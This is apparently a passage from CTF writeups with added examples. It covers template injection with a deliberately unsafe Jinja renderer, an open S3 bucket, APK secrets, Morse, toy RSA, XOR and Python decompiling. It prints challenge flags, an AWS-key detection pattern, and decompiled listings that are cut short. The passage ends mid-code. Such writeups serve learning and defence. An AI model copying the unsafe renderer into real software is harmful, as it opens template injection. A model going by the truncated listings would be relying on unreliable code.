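    return Template("<p>You entered: " + str(escape(chem)) + "</p>").render()

def render_safe(chem):
    """Fixed template text; the input is passed as DATA, so braces in it are never interpreted.
    The `e` filter additionally HTML-escapes it on output."""
    return Template("<p>You entered: {{ chem | e }}</p>").render(chem=chem)

PROBE = "{{ 7 * 7 }}"   # harmless probe: seeing 49 in the output means expressions execute

if __name__ == "__main__":
    print("unsafe  :", render_unsafe(PROBE))
    print("escaped :", render_escaped_but_still_unsafe(PROBE))
    print("safe    :", render_safe(PROBE))
    print("safe    :", render_safe("<b>chem</b>"))
```

The safe form needs no keyword blacklist at all, which is why it is the fix to prefer over the sanitizer in the Secure Coding section: there is no list of names to keep up to date and nothing for an attacker to encode around.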

5) Buckets

  • Challenge
  • I had already solved a cloud challenge during neverLanCTF, so I wondered if this would be some improper authorization configuration

  • Recon the tamuctf bucket

  • Going to the Amazon S3 subdomain with the bucket name.
  • Navigating to the corresponding link for the flag
  • Flag


1) Strings

  • Find the secrets?

  • I have done some Android programming/projects; values are stored in strings.xml, would that be the obvious hint in the challenge name?

  • Used the strings tool on the binary APK file to expose the flag (it was unsuccessful).

  • I am new to reversing Android apps; Google led me to this nice project.

apktool –> https://github.com/iBotPeaches/Apktool

  • An APK file is a zip file. Unzip howdyapp.apk –> we get most of the files and most of them are not readable, except for some strings. Basic grep and searches for flag, secret, gigem{ were unsuccessful too.

  • OK, now using the tool: apktool d howdyapp.apk

root@kali:~/Downloads/howdyapp# apktool d howdyapp.apk 
I: Using Apktool 2.3.4 on howdyapp.apk
I: Loading resource table...
I: Decoding AndroidManifest.xml with resources...
S: WARNING: Could not write to (/root/.local/share/apktool/framework), using /tmp instead...
S: Please be aware this is a volatile directory and frameworks could go missing, please utilize --frame-path if the default storage directory is unavailable
I: Loading resource table from file: /tmp/1.apk

I: Regular manifest package...
I: Decoding file-resources...
I: Decoding values */* XMLs...
I: Baksmaling classes.dex...
I: Copying assets and libs...
I: Copying unknown files...
I: Copying original files...
  • Reading this resource about Android secrets also helped –> https://rammic.github.io/2015/07/28/hiding-secrets-in-android-apps/

  • Looking at res/values/strings.xml, it has the flag as one of the values

  • Flag: gigem{infinite_gigems}
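Once apktool has decoded the APK, the check that found the flag here (a value in res/values/strings.xml) generalises to a small secrets scan over that file, which is the same check a reviewer would run on a real app before release. The following is an added example, not apktool's or the writeup's code: the XML is constructed to resemble what apktool writes, the resource names and values are invented, and the flag-style value is a placeholder in the gigem{...} format rather than the challenge's flag.

```python
"""Scan a decoded APK's res/values/strings.xml for values that look like embedded secrets.

Added example (not from the writeup). The XML and every value in it are constructed.
"""
import re
import xml.etree.ElementTree as ET

STRINGS_XML = """<?xml version="1.0" encoding="utf-8"?>
<resources>
    <string name="app_name">Howdy</string>
    <string name="welcome">Howdy, Ags!</string>
    <string name="secret">gigem{placeholder_not_the_real_flag}</string>
    <string name="api_key">AKIAEXAMPLEEXAMPLE12</string>
    <string name="support_url">https://example.test/help</string>
</resources>
"""

# resource names that deserve a second look regardless of their value
SUSPICIOUS_NAMES = re.compile(r"(secret|key|token|passw|flag|cred)", re.I)

# value shapes that deserve a second look regardless of their name
SUSPICIOUS_VALUES = [
    ("ctf flag", re.compile(r"gigem\{[^}]*\}", re.I)),
    ("AWS access key id", re.compile(r"\bAKIA[0-9A-Z]{16}\b")),
    ("long opaque token", re.compile(r"^[A-Za-z0-9_\-]{32,}$")),
]

def find_secrets(xml_text):
    """Return [(resource name, value, reasons)] for strings matching a name or value heuristic."""
    root = ET.fromstring(xml_text)
    findings = []
    for node in root.iter("string"):
        name = node.get("name", "")
        value = (node.text or "").strip()
        reasons = []
        if SUSPICIOUS_NAMES.search(name):
            reasons.append("suspicious name")
        for label, pattern in SUSPICIOUS_VALUES:
            if pattern.search(value):
                reasons.append(label)
        if reasons:
            findings.append((name, value, ", ".join(reasons)))
    return findings

if __name__ == "__main__":
    for name, value, reasons in find_secrets(STRINGS_XML):
        print(f"{name!r}: {value!r}  [{reasons}]")
```

The name heuristic is what the writeup's grep for "flag" and "secret" did by hand; the value heuristics catch the more common real-world case where the resource is innocently named but the value itself has a recognisable shape.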


1) -.-

Obviously, dot and dash == Morse code

  • Challenge
  • Morse coded cipher text dah-dah-dah-dah-dah dah-di-di-dah di-di-di-di-dit dah-dah-di-di-dit dah-dah-di-di-dit dah-dah-dah-dah-dah di-di-dah-dah-dah di-dah dah-di-di-di-dit dah-di-dah-dit di-di-di-di-dit dah-dah-dah-di-dit dah-dah-di-di-dit di-di-di-di-dah di-di-di-di-dah dah-dah-di-di-dit di-di-di-di-dit di-dah-dah-dah-dah di-di-di-dah-dah dah-dah-dah-di-dit dah-di-di-di-dit di-di-di-di-dit di-di-di-dah-dah dah-dah-dah-di-dit dah-dah-di-di-dit di-dah-dah-dah-dah dah-di-di-di-dit dit dah-di-di-di-dit dah-di-dit di-di-di-di-dah dah-di-dit di-di-di-di-dit dah-dah-dah-dah-dit di-di-di-di-dit di-di-di-di-dit di-di-dah-dah-dah di-dah dah-dah-di-di-dit di-di-di-dah-dah dah-dah-di-di-dit dah-di-di-di-dit di-di-di-di-dah dah-di-di-di-dit di-di-di-di-dah dah-dah-dah-di-dit dah-di-di-di-dit dah-di-di-dit dah-di-di-di-dit di-dah di-di-di-di-dah dah-dah-dah-dah-dit dah-dah-di-di-dit di-di-di-di-dah di-di-dah-dah-dah di-dah di-di-di-di-dit di-di-dah-dah-dah di-di-di-di-dit di-dah-dah-dah-dah di-di-dah-dah-dah dah-di-di-di-dit di-di-di-di-dah di-dah dah-dah-di-di-dit dah-dah-dah-dah-dah di-di-di-di-dit di-dah dah-dah-di-di-dit dah-di-di-di-dit dah-di-di-di-dit di-dah dah-di-di-di-dit dah-di-dit di-di-dah-dah-dah di-dah-dah-dah-dah di-di-dah-dah-dah di-di-di-di-dit di-di-dah-dah-dah di-di-di-di-dit di-di-di-di-dah dah-di-di-dit di-di-di-di-dah di-di-di-di-dah dah-di-di-di-dit dah-di-di-dit dah-di-di-di-dit dah-di-di-di-dit dah-dah-di-di-dit dah-dah-dah-dah-dah di-di-dah-dah-dah di-di-di-dah-dah di-di-di-di-dit dit di-di-di-di-dah dit di-di-di-dah-dah dah-dah-dah-dah-dit dah-di-di-di-dit dah-di-di-di-dit dah-di-di-di-dit dah-di-di-dit di-di-di-dah-dah di-di-di-di-dah dah-di-di-di-dit di-di-di-di-dah di-di-di-di-dit di-di-di-di-dit di-di-di-dah-dah di-di-di-di-dah dah-di-di-di-dit dah-di-dah-dit di-di-di-di-dah di-di-dah-dah-dah di-di-di-dah-dah di-di-di-dah-dah dah-dah-di-di-dit di-di-dah-dah-dah di-di-di-di-dit di-di-di-di-dah dah-di-di-di-dit di-di-dah-dit di-di-di-di-dit 
di-di-di-di-dah di-di-di-dah-dah dah-dah-dah-dah-dah di-di-di-di-dit dah-dah-dah-dah-dah di-di-di-di-dit di-dah di-di-di-di-dit di-dah-dah-dah-dah dah-di-di-di-dit dah-di-dit di-di-di-di-dah di-di-di-dah-dah di-di-di-di-dit di-dah-dah-dah-dah di-di-di-di-dah di-di-di-di-dit di-di-di-di-dah dah-di-di-dit di-di-di-di-dit dah-dah-dah-dah-dit di-di-di-di-dah di-di-dah-dah-dah di-di-di-dah-dah di-di-di-di-dah di-di-di-di-dit di-dah di-di-di-di-dah dah-di-dit dah-dah-di-di-dit dah-di-di-di-dit di-di-dah-dah-dah di-dah di-di-dah-dah-dah di-dah-dah-dah-dah di-di-di-di-dah dah-di-di-di-dit dah-di-di-di-dit dah-di-di-dit di-di-di-dah-dah dah-dah-dah-di-dit dah-di-di-di-dit dah-di-dah-dit di-di-dah-dah-dah di-di-di-di-dit dah-di-di-di-dit di-di-dah-dah-dah dah-di-di-di-dit di-dah dah-dah-di-di-dit di-dah-dah-dah-dah dah-di-di-di-dit dah-di-dah-dit di-di-di-di-dit dah-dah-dah-dah-dah di-di-di-di-dah dah-di-dit dah-di-di-di-dit dah-di-di-di-dit di-di-di-di-dah dah-dah-dah-dah-dit di-di-di-di-dah dah-dah-di-di-dit dah-di-di-di-dit dah-di-dit dah-di-di-di-dit di-dah-dah-dah-dah di-di-dah-dah-dah di-di-di-di-dit di-di-dah-dah-dah di-di-di-di-dit di-di-di-di-dah dah-di-di-di-dit dah-dah-di-di-dit di-dah di-di-di-di-dah dah-dah-di-di-dit di-di-dah-dah-dah dah-dah-dah-dah-dah dah-di-di-di-dit dah-dah-di-di-dit dah-di-di-di-dit dah-dah-dah-dah-dit dah-di-di-di-dit dah-dah-di-di-dit dah-di-di-di-dit di-di-di-di-dit dah-di-di-di-dit dah-di-dit dah-dah-di-di-dit dah-di-di-dit di-di-di-di-dah di-di-di-dah-dah di-di-di-dah-dah di-dah-dah-dah-dah dah-di-di-di-dit dah-dah-dah-dah-dit dah-di-di-di-dit di-di-di-dah-dah di-di-di-di-dah dah-di-di-dit di-di-di-di-dit di-di-dah-dit dah-di-di-di-dit di-di-di-dah-dah dah-di-di-di-dit dah-di-dah-dit di-di-di-dah-dah di-dah-dah-dah-dah di-di-di-di-dah di-di-di-dah-dah di-di-di-di-dah dah-di-di-dit di-di-dah-dah-dah dah-di-dit dah-dah-di-di-dit dah-dah-dah-dah-dit di-di-di-dah-dah dah-dah-dah-dah-dah dah-dah-di-di-dit di-di-di-di-dit di-di-di-di-dit 
di-di-dah-dit dah-di-di-di-dit dah-dah-dah-di-dit di-di-di-dah-dah di-di-di-di-dah dah-dah-di-di-dit dah-di-di-di-dit di-di-di-dah-dah di-di-di-dah-dah di-di-di-di-dit di-di-dah-dit dah-di-di-di-dit dah-di-dit di-di-di-dah-dah di-di-di-di-dah di-di-di-di-dah dah-dah-dah-dah-dit di-di-di-dah-dah di-dah-dah-dah-dah dah-dah-di-di-dit dah-di-dit di-di-dah-dah-dah dah-dah-dah-dah-dah dah-dah-di-di-dit di-di-di-di-dit dah-dah-di-di-dit dah-di-di-di-dit di-di-di-dah-dah di-di-di-di-dah dah-dah-di-di-dit dah-di-di-di-dit dah-dah-di-di-dit di-dah di-di-di-di-dah dah-di-di-dit di-di-di-di-dit di-dah dah-dah-di-di-dit di-di-di-di-dah di-di-di-dah-dah di-di-di-di-dah dah-dah-di-di-dit dah-dah-dah-dah-dit dah-di-di-di-dit di-di-dah-dit dah-di-di-di-dit dah-di-dit dah-di-di-di-dit dah-dah-dah-dah-dit di-di-di-di-dah di-di-di-di-dah di-di-di-di-dit di-di-di-dah-dah dah-di-di-di-dit dah-dah-dah-di-dit di-di-di-di-dah dah-di-dah-dit dah-di-di-di-dit dah-di-dit di-di-di-dah-dah dah-dah-dah-di-dit di-di-di-di-dit di-dah-dah-dah-dah di-di-di-di-dah di-di-di-di-dit di-di-di-di-dah dah-di-di-di-dit dah-di-di-di-dit dit di-di-di-di-dit di-di-di-di-dit dah-dah-di-di-dit di-di-di-di-dah dah-dah-di-di-dit dah-dah-di-di-dit di-di-di-di-dah di-dah di-di-di-di-dah dah-dah-dah-dah-dah di-di-di-di-dah dit dah-dah-di-di-dit di-di-di-di-dit di-di-di-di-dah di-di-dah-dit di-di-di-di-dit dah-dah-dah-dah-dit dah-di-di-di-dit dah-di-di-di-dit di-di-di-di-dit dah-dah-dah-di-dit di-di-dah-dah-dah dah-di-di-di-dit di-di-di-dah-dah dah-dah-dah-di-dit dah-dah-di-di-dit di-di-di-di-dit di-di-di-di-dah dah-dah-dah-dah-dah di-di-di-di-dah dah-dah-di-di-dit dah-di-di-di-dit dit di-di-dah-dah-dah di-dah-dah-dah-dah di-di-di-dah-dah di-dah-dah-dah-dah di-di-dah-dah-dah di-di-di-di-dit di-di-di-di-dit di-di-di-di-dah dah-dah-di-di-dit di-dah-dah-dah-dah dah-dah-di-di-dit dah-di-di-di-dit di-di-di-dah-dah dah-dah-dah-dah-dah di-di-di-di-dit dah-di-di-di-dit dah-di-di-di-dit di-di-di-dah-dah di-di-di-di-dit 
di-di-dah-dah-dah dah-dah-di-di-dit di-dah di-di-di-di-dit dah-di-di-di-dit di-di-dah-dah-dah di-dah-dah-dah-dah dah-di-di-di-dit di-dah di-di-dah-dah-dah di-dah-dah-dah-dah dah-dah-di-di-dit dah-di-di-di-dit dah-dah-di-di-dit di-di-di-di-dit dah-dah-di-di-dit di-di-di-di-dit dah-dah-di-di-dit dah-dah-dah-dah-dah di-di-di-dah-dah dah-dah-dah-di-dit di-di-di-di-dah di-di-dah-dah-dah dah-di-di-di-dit di-dah dah-di-di-di-dit di-di-di-di-dah di-di-di-di-dah dit di-di-di-di-dah dah-dah-dah-dah-dit dah-dah-di-di-dit di-dah-dah-dah-dah di-di-di-di-dah di-di-di-di-dit di-di-di-dah-dah di-di-di-di-dit dah-dah-di-di-dit dah-dah-di-di-dit di-di-dah-dah-dah di-di-di-dah-dah di-di-dah-dah-dah di-di-di-di-dah di-di-dah-dah-dah di-di-di-di-dit di-di-di-di-dit dah-di-di-di-dit di-di-di-dah-dah di-di-di-di-dah di-di-di-di-dit di-di-di-di-dit di-di-di-di-dit di-dah di-di-di-di-dah di-di-dah-dit di-di-di-di-dit dah-dah-dah-dah-dit di-di-di-di-dit di-dah di-di-di-dah-dah di-di-dah-dah-dah dah-dah-di-di-dit di-dah di-di-di-dah-dah dah-dah-di-di-dit di-di-di-di-dit di-di-di-di-dah di-di-di-dah-dah di-di-dah-dah-dah di-di-di-dah-dah di-di-di-di-dit dah-dah-di-di-dit di-di-di-di-dah di-di-di-dah-dah dah-dah-di-di-dit di-di-dah-dah-dah dah-di-di-di-dit dah-dah-di-di-dit dah-dah-dah-di-dit di-di-di-di-dah dah-di-dah-dit di-di-di-di-dah dah-dah-dah-dah-dah di-di-di-di-dit dah-dah-di-di-dit di-di-di-di-dah di-di-dah-dit di-di-di-dah-dah dah-dah-di-di-dit di-di-di-dah-dah di-di-di-di-dah di-di-di-dah-dah di-dah-dah-dah-dah di-di-di-dah-dah dah-dah-dah-dah-dah di-di-di-di-dit di-dah-dah-dah-dah di-di-di-di-dah dah-dah-dah-dah-dit


  • The format, using literal .- versus di/dah, was a little confusing. This helper helped
  • Python decode Morse with a mapping of spoken Morse ("di"/"dah") to ASCII
import sys

# spoken-Morse symbol -> character
morse_decode_dict = {
        "di-dah": "A",
        "dah-di-di-dit": "B",
        "dah-di-dah-dit": "C",
        "dah-di-dit": "D",
        "dit": "E",
        "di-di-dah-dit": "F",
        "dah-dah-dit": "G",
        "di-di-di-dit": "H",
        "di-dit": "I",
        "di-dah-dah-dah": "J",
        "dah-di-dah": "K",
        "di-dah-di-dit": "L",
        "dah-dah": "M",
        "dah-dit": "N",
        "dah-dah-dah": "O",
        "di-dah-dah-dit": "P",
        "dah-dah-di-dah": "Q",
        "di-dah-dit": "R",
        "di-di-dit": "S",
        "dah": "T",
        "di-di-dah": "U",
        "di-di-di-dah": "V",
        "di-dah-dah": "W",
        "dah-di-di-dah": "X",
        "dah-di-dah-dah": "Y",   # was misspelled "dah-do-dah-dah", so Y could never decode
        "dah-dah-di-dit": "Z",
        "dah-dah-dah-dah-dah": "0",
        "di-dah-dah-dah-dah": "1",
        "di-di-dah-dah-dah": "2",
        "di-di-di-dah-dah": "3",
        "di-di-di-di-dah": "4",
        "di-di-di-di-dit": "5",
        "dah-di-di-di-dit": "6",
        "dah-dah-di-di-dit": "7",
        "dah-dah-dah-di-dit": "8",
        "dah-dah-dah-dah-dit": "9"
}

# the challenge's Morse text, one symbol per whitespace-separated token (it spans several lines)
with open("flag.txt", "r") as flag_morse:
    flag_morse_content = flag_morse.read().split()

result = ""
for word in flag_morse_content:
    if word in morse_decode_dict:
        result += morse_decode_dict[word]
    else:
        print("unknown symbol:", word, file=sys.stderr)
print(result)
print()
# the decoded text starts with "0X" followed by hex digits, so strip the prefix and decode the hex
print(bytes.fromhex(result[2:]).decode())
  • Flag

2) RSaaay

  • Challenge
  • Less confidence in crypto challenges, but I knew the RSA concept so I took it on…

  • Steps tried:
    1) As it was an easy challenge, assumed just (n, d) were given to decrypt (a big math-operation challenge, and RSA operates on numbers for enc/dec)
      • string –> hex –> int [Fail]
    2) Assumed p, q were given to compute RSA
      • After a few failed attempts, remembered something –> one of the numbers in the given pair () was not prime, so it was meaningless to assume p, q. The number that is not prime should be n [Fail]
    3) Assume the given pair is (n, d) [Success]
      • Ended up at Alok's blog to crack RSA
      • Key cracking and generation was a success, but decryption failed. Even tried space-separated data. It did not work and I was rushing to get the flag.
      • Used the same params and performed the decryption in CrypTool, then converted the integers obtained to chars

Used a hybrid method –> followed Alok's blog until it made sense, then used the RSA calculator to solve it.

  • Checking for prime numbers helped resolve the confusion
  • Steps followed from Alok's blog to crack RSA
  • The private key
  • Used the RSA calculator to proceed at https://www.cs.drexel.edu/~jpopyack/IntroCS/HW/RSAWorksheet.html
  • Decrypt each part of the cipher text and convert them back to characters
  • Flag

— This method is not recommended as I rushed my way, seeking references to ultimately find the flag. I will publish a more reliable method soon.
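The steps above (tell n apart from p/q by primality, factor the small modulus, derive the private exponent, decrypt each block and turn the integers back into characters) are a short program once written out. The following is an added example of that whole chain, not Alok's blog or the RSA calculator the writeup used: the key (p=61, q=53, e=17, n=3233) is a textbook toy key, not the challenge's, and the message is constructed.

```python
"""Small-modulus RSA worked end to end: identify n, factor it, derive d, decrypt per-character blocks.

Added example (not from the writeup). Toy key only; trial division is hopeless at real key sizes.
"""
from math import isqrt

def is_prime(x):
    if x < 2:
        return False
    return all(x % i for i in range(2, isqrt(x) + 1))

def which_is_modulus(pair):
    """Of two given numbers, the composite one must be n (the 'not prime -> must be n' insight)."""
    composites = [x for x in pair if not is_prime(x)]
    return composites[0] if len(composites) == 1 else None

def factor_n(n):
    """Trial division, which is all a CTF-sized n needs; returns (p, q) with p <= q."""
    for p in range(2, isqrt(n) + 1):
        if n % p == 0:
            return p, n // p
    raise ValueError("n has no factor below its square root")

def private_exponent(n, e):
    """d = e^-1 mod phi(n), recoverable only because n was factored."""
    p, q = factor_n(n)
    phi = (p - 1) * (q - 1)
    return pow(e, -1, phi)  # modular inverse, Python 3.8+

def encrypt_blocks(text, n, e):
    """One RSA block per character, as the challenge did; every ord(ch) must be < n."""
    return [pow(ord(ch), e, n) for ch in text]

def decrypt_blocks(blocks, n, d):
    """Undo encrypt_blocks: each integer back to a character."""
    return "".join(chr(pow(c, d, n)) for c in blocks)

if __name__ == "__main__":
    n, e = 3233, 17                      # 3233 = 61 * 53, a textbook toy modulus
    print("modulus picked from the pair:", which_is_modulus((3233, 17)))
    d = private_exponent(n, e)
    print("p, q:", factor_n(n), " d:", d)
    cipher = encrypt_blocks("gigem{rsa}", n, e)   # constructed message
    print("cipher blocks:", cipher)
    print("recovered    :", decrypt_blocks(cipher, n, d))
```

Two things the toy makes visible that the calculator hid: the private exponent falls out the moment n is factored, so the security of the scheme is exactly the difficulty of that step, and per-character blocks are deterministic (the same letter always encrypts to the same integer), which is its own weakness independent of key size.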

  • Reference:
* Alok's Blog Helped a lot for this challenge: https://www.quaxio.com/exploring_three_weaknesses_in_rsa/
* https://www.cryptool.org/en/cto-highlights/rsa-step-by-step
* https://www.cs.drexel.edu/~jpopyack/IntroCS/HW/RSAWorksheet.html
* https://asecuritysite.com/Encryption/rsa?val=11%2C3%2C3%2C4

Other dig/helpers:
* https://www.dcode.fr/rsa-cipher
* http://www.math.com/students/calculators/source/prime-number.htm
* https://crypto.stackexchange.com/questions/10590/what-makes-rsa-secure-by-using-prime-numbers
* https://www.mtholyoke.edu/courses/quenell/s2003/ma139/js/powermod.html
* https://cryptography.io/en/latest/hazmat/primitives/asymmetric/rsa/#key-loading
* http://billatnapier.com/2011_tut_encryption.pdf
* https://gist.github.com/AArnott/c105f9a1c8ebf546a027
* https://www.calculator.net/big-number-calculator.html?cx=906851&cy=2531257&cp=20&co=pow

3) Smiley :)

This was an easy challenge, but to me it was the hardest to solve because of a number of diversions and misleading paths.

  • Challenge
  • Repeated Key XOR - Python
import base64
import sys

# the base64 ciphertext from the challenge is passed as the first argument
cipher_text = base64.b64decode(sys.argv[1])

# repeat the two-byte key ":)" so it is at least as long as the ciphertext
key = ":)" * len(cipher_text)

# XOR byte by byte; zip truncates the over-long key to the ciphertext length
print "".join([chr(ord(c1) ^ ord(c2)) for (c1, c2) in zip(cipher_text, key)])
  • Flag

  • What did not work?
  * Was diverted a lot by the various hints in this challenge.
    - Emoji tweets with the ciphertext
    - Tried very hard for a long time to discover a "smiley cipher"
      - Detour at codeEmoji
      - Some detour at using emoji characters for encryption
      - The website that claims a smiley cipher --> enisoc.com/smileycipher was taken down --> so looked into the Google archives to possibly find the code --> found that the key was just repeating XOR with smileys
      - Also ended up at different articles about XOR encryption being broken with smiley pictures.
    - After a long search, knew that the given string was the ciphertext and the smiley was the key. Repeating XOR solved it...
  * https://ayende.com/blog/177729/emoji-encoding-a-new-style-for-binary-encoding-for-the-web
  * https://gist.github.com/ayende/c7977cda3fe64c1399fea80837c9904e
  * https://stackoverflow.com/questions/31280295/python-reading-emoji-unicode-characters
  * https://cryptii.com/pipes/morse-code-with-emojis
  * http://decodemoji.com/
  * https://codemoji.org/#/encrypt
  * https://www.dcode.fr/
    - Went through all the different ciphers, crypto and symbols (was helpful in getting to know different ciphers though)

Lesson: Revert back and rethink every now and then before insanely digging...
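The repeating-key XOR from the Smiley solution, generalised to any key length and written for Python 3 bytes, as an added example (not the writeup's code). The ciphertext it decodes is constructed inside the block by encrypting a made-up flag with the key ":)"; the real challenge string is not reproduced.

```python
"""Added example (not the writeup's own code): repeating-key XOR in Python 3,
generalised to any key length. The sample ciphertext is constructed here by
encrypting a made-up plaintext with the key ":)"."""
import base64
from itertools import cycle


def xor_repeat(data: bytes, key: bytes) -> bytes:
    """XOR each byte of data with the key repeated as often as needed.
    XOR is its own inverse, so one function both encrypts and decrypts."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def decode_smiley(cipher_b64: str, key: bytes = b":)") -> str:
    """Base64-decode the challenge string, then undo the repeating-key XOR."""
    return xor_repeat(base64.b64decode(cipher_b64), key).decode("ascii")


# constructed sample: encrypt a made-up flag so the demo is self-contained
SAMPLE_PLAINTEXT = "gigem{x0r_w1th_sm1l3y}"
SAMPLE_CIPHER_B64 = base64.b64encode(
    xor_repeat(SAMPLE_PLAINTEXT.encode("ascii"), b":)")
).decode("ascii")

if __name__ == "__main__":
    print("ciphertext (base64):", SAMPLE_CIPHER_B64)
    print("decoded:", decode_smiley(SAMPLE_CIPHER_B64))
```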


1) Cheesy

  • Challenge

  • Steps to Flag - Used Strings and Base64 decode
root@kali:~/Downloads# file reversing1 
reversing1: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=a0d672b744b45bdc3f634cf144d1ae3f2a0f4509, not stripped
root@kali:~/Downloads# strings reversing1 
Hello! I bet you are looking for the flag..
I really like basic encoding.. can you tell what kind I used??
GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.11) 5.4.0 20160609
root@kali:~/Downloads# python
Python 2.7.15+ (default, Nov 28 2018, 16:27:22) 
[GCC 8.2.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import base64
>>> base64.b64decode("QUFBQUFBQUFBQUFBQUFBQQ==")
>>> base64.b64decode("RkxBR2ZsYWdGTEFHZmxhZ0ZMQUdmbGFn")
>>> base64.b64decode("Q2FuIHlvdSByZWNvZ25pemUgYmFzZTY0Pz8=")
'Can you recognize base64??'
>>> base64.b64decode("Z2lnZW17M2E1eV9SM3YzcjUxTjYhfQ==")
  • Flag: gigem{3a5y_R3v3r51N6!}
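The `strings` plus manual `base64.b64decode` routine above, automated: an added example (not the writeup's code) that pulls printable runs out of a binary the way strings(1) does, keeps the ones that are well-formed base64, and reports those that decode to clean ASCII. The input blob is constructed here; the base64 tokens embedded in it are the ones shown in the terminal session above.

```python
"""Added example (not the writeup's own code): find and decode base64-looking
strings in a binary. SAMPLE_BINARY is a constructed stand-in for reversing1."""
import base64
import binascii
import re

PRINTABLE_RUN = re.compile(rb"[\x20-\x7e]{4,}")          # what strings(1) prints by default
B64_TOKEN = re.compile(rb"^[A-Za-z0-9+/]{12,}={0,2}$")   # base64 alphabet, reasonable length


def strings(blob: bytes, min_len: int = 4):
    """Return printable ASCII runs of at least min_len bytes, like the strings(1) tool."""
    return [m.group(0) for m in PRINTABLE_RUN.finditer(blob) if len(m.group(0)) >= min_len]


def base64_candidates(blob: bytes):
    """Return (token, decoded) pairs for every string that is well-formed base64
    and decodes to printable ASCII. Strict validation rejects look-alikes."""
    found = []
    for s in strings(blob):
        if not B64_TOKEN.match(s) or len(s) % 4:
            continue
        try:
            raw = base64.b64decode(s, validate=True)
        except (binascii.Error, ValueError):
            continue
        if raw and all(0x20 <= b < 0x7f for b in raw):
            found.append((s.decode("ascii"), raw.decode("ascii")))
    return found


# constructed stand-in for the reversing1 ELF: a few non-printable bytes around
# the same strings the writeup found with `strings`
SAMPLE_BINARY = (
    b"\x7fELF\x02\x01\x01\x00" + b"\x00" * 8 +
    b"Hello! I bet you are looking for the flag..\x00" +
    b"I really like basic encoding.. can you tell what kind I used??\x00" +
    b"\x48\x89\xe5\x00" +
    b"QUFBQUFBQUFBQUFBQUFBQQ==\x00" +
    b"RkxBR2ZsYWdGTEFHZmxhZ0ZMQUdmbGFn\x00" +
    b"Q2FuIHlvdSByZWNvZ25pemUgYmFzZTY0Pz8=\x00" +
    b"Z2lnZW17M2E1eV9SM3YzcjUxTjYhfQ==\x00" +
    b"GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.11) 5.4.0 20160609\x00"
)

if __name__ == "__main__":
    for token, plain in base64_candidates(SAMPLE_BINARY):
        print("%-40s -> %s" % (token, plain))
```

The "decodes to printable ASCII" filter is what keeps the output short on a real binary: plenty of symbol names happen to sit inside the base64 alphabet, but their decoded bytes are garbage and get dropped.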

2) Snakes Over Cheese

– wow this is python reversing

  • Challenge
  • Steps to the Flag
    • Download and Install: Used the uncompyle2 project from GitHub to decompile the Python bytecode (.pyc) back to source.
root@kali:~/Desktop/pyReverse# git clone https://github.com/Mysterie/uncompyle2
Cloning into 'uncompyle2'...
remote: Enumerating objects: 329, done.
remote: Total 329 (delta 0), reused 0 (delta 0), pack-reused 329
Receiving objects: 100% (329/329), 478.81 KiB | 2.66 MiB/s, done.
Resolving deltas: 100% (176/176), done.
root@kali:~/Desktop/pyReverse# ls
root@kali:~/Desktop/pyReverse# cd uncompyle2/
root@kali:~/Desktop/pyReverse/uncompyle2# ls
compile_tests  PKG-INFO    scripts    setup.py  test_pythonlib.py
MANIFEST       README.rst  setup.cfg  test      uncompyle2

root@kali:~/Desktop/pyReverse/uncompyle2# python setup.py install
running install
running build
running install_scripts
copying build/scripts-2.7/uncompyle2 -> /usr/local/bin
changing mode of /usr/local/bin/uncompyle2 to 755
running install_egg_info
Writing /usr/local/lib/python2.7/dist-packages/uncompyle2-1.1.egg-info
  • Run uncompyle against the pyc file
root@kali:~/Desktop/pyReverse/uncompyle2# ./scripts/uncompyle2 ~/Downloads/reversing2.pyc 
# 2019.02.23 11:56:29 PST
# Embedded file name: reversing2.py
from datetime import datetime
Fqaa = [102,
XidT = [83,

def main():
    print 'Clock.exe'
    input = raw_input('>: ').strip()
    kUIl = ''
    for i in XidT:
        kUIl += chr(i)

    if input == kUIl:
        alYe = ''
        for i in Fqaa:
            alYe += chr(i)

        print alYe
        print datetime.now()

if __name__ == '__main__':
# okay decompyling /root/Downloads/reversing2.pyc 
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2019.02.23 11:56:29 PST
  • Analyse Python Code: Edit the python file to print the Secret Key and Flag
root@kali:~/Downloads# cat reversing2.py
# 2019.02.23 11:57:43 PST
# Embedded file name: reversing2.py
from datetime import datetime
Fqaa = [102,
XidT = [83,

def main():
    print 'Clock.exe'
    input = raw_input('>: ').strip()
    kUIl = ''
    for i in XidT:
        kUIl += chr(i)
    print kUIl
    if input == kUIl:
        alYe = ''
        for i in Fqaa:
            alYe += chr(i)

        print alYe
        print datetime.now()

if __name__ == '__main__':
# okay decompyling /root/Downloads/reversing2.pyc 
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2019.02.23 11:57:43 PST
  • Run Code with Secret Key to get flag
root@kali:~/Downloads# python reversing2.py
>: 123
2019-02-23 11:58:44.911365
root@kali:~/Downloads# python reversing2.py
>: SuperSecretKey
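Instead of editing the decompiled script and running it, the two integer lists can be decoded statically. The following is an added example (not the writeup's code or the challenge's): it pulls every `NAME = [int, ...]` assignment out of decompiler output with a regex (chosen over `ast` so that the Python 2 print statements in the decompiled source do not matter) and applies the same `chr()` join the script does. The source text is constructed; the key list spells the key entered above (SuperSecretKey), while the flag list spells a made-up value, not the real flag.

```python
"""Added example (not the writeup's own code): statically recover strings that
decompiled code builds from integer lists. SAMPLE_SOURCE is constructed."""
import re

# NAME = [ints, possibly spread over several lines ]
LIST_ASSIGN = re.compile(r"^(\w+)\s*=\s*\[([\d,\s]+)\]\s*$", re.MULTILINE)


def ints_to_text(values):
    """chr() each code point and join, exactly what the decompiled loops do."""
    return "".join(chr(v) for v in values)


def extract_int_lists(source: str) -> dict:
    """Map every `NAME = [int, int, ...]` assignment in source to its decoded text."""
    out = {}
    for name, body in LIST_ASSIGN.findall(source):
        values = [int(tok) for tok in body.replace("\n", " ").split(",") if tok.strip()]
        if values and all(0 <= v < 0x110000 for v in values):
            out[name] = ints_to_text(values)
    return out


def as_list_literal(text: str) -> str:
    """Only used to build the constructed sample in the shape uncompyle2 prints."""
    return "[" + ",\n ".join(str(ord(c)) for c in text) + "]"


# constructed decompiler-style output (Python 2 syntax, as uncompyle2 prints it);
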